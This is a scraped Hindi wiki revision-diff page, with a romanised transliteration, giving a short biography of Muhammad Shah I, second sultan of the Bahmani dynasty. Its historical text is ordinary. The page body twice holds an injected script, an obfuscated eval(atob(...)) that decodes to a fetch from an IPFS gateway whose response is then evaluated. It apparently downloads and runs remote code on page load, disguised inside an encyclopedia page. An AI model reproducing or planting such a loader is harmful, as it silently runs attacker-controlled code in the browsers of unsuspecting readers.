Difference between revisions of "मुहम्मद बहमनी शाह प्रथम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
मुहम्मद शाह प्रथम [[बहमनी वंश]] का द्वितीय सुल्तान था, जिसने 1358 से 1373 ई. तक शासन किया। उसके शासन का अधिकांश समय दक्षिण के [[विजयनगर साम्राज्य|विजयनगर]] और उत्तर में [[बारंगल]] के काकतीय हिन्दू राजवंशों से युद्धों में ही बीता। वह कठोर शासक था और अपने सारे राज्य में उसने चोरी-डकैती, लूटमार की अराजकता को पूर्णतया दबा दिया। उसने नयी शासन व्यवस्था चलायी जिसका संचालन केन्द्र उसके आठ मंत्रियों द्वारा होता था। उसने महल के रक्षकों की गारद का पुनर्गठन किया। उसने प्रान्तों के वार्षिक शाही दौरे की प्रथा भी प्रचलित की, जिससे उन पर प्रभावशाली नियंत्रण बना रहे। उसकी मृत्यु अत्यधिक मद्यपान के कारण हुई।
 
मुहम्मद शाह प्रथम [[बहमनी वंश]] का द्वितीय सुल्तान था, जिसने 1358 से 1373 ई. तक शासन किया। उसके शासन का अधिकांश समय दक्षिण के [[विजयनगर साम्राज्य|विजयनगर]] और उत्तर में [[बारंगल]] के काकतीय हिन्दू राजवंशों से युद्धों में ही बीता। वह कठोर शासक था और अपने सारे राज्य में उसने चोरी-डकैती, लूटमार की अराजकता को पूर्णतया दबा दिया। उसने नयी शासन व्यवस्था चलायी जिसका संचालन केन्द्र उसके आठ मंत्रियों द्वारा होता था। उसने महल के रक्षकों की गारद का पुनर्गठन किया। उसने प्रान्तों के वार्षिक शाही दौरे की प्रथा भी प्रचलित की, जिससे उन पर प्रभावशाली नियंत्रण बना रहे। उसकी मृत्यु अत्यधिक मद्यपान के कारण हुई।
  
 +
{{प्रचार}}
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक=|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक=|माध्यमिक=|पूर्णता=|शोध=}}
 
==संबंधित लेख==
 
==संबंधित लेख==

Revision as of 08:54, 7 July 2011

muhammad shah pratham bahamani vansh ka dvitiy sultan tha, jisane 1358 se 1373 ee. tak shasan kiya. usake shasan ka adhikaansh samay dakshin ke vijayanagar aur uttar mean barangal ke kakatiy hindoo rajavanshoan se yuddhoan mean hi bita. vah kathor shasak tha aur apane sare rajy mean usane chori-dakaiti, lootamar ki arajakata ko poornataya daba diya. usane nayi shasan vyavastha chalayi jisaka sanchalan kendr usake ath mantriyoan dvara hota tha. usane mahal ke rakshakoan ki garad ka punargathan kiya. usane prantoan ke varshik shahi daure ki pratha bhi prachalit ki, jisase un par prabhavashali niyantran bana rahe. usaki mrityu atyadhik madyapan ke karan huee.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>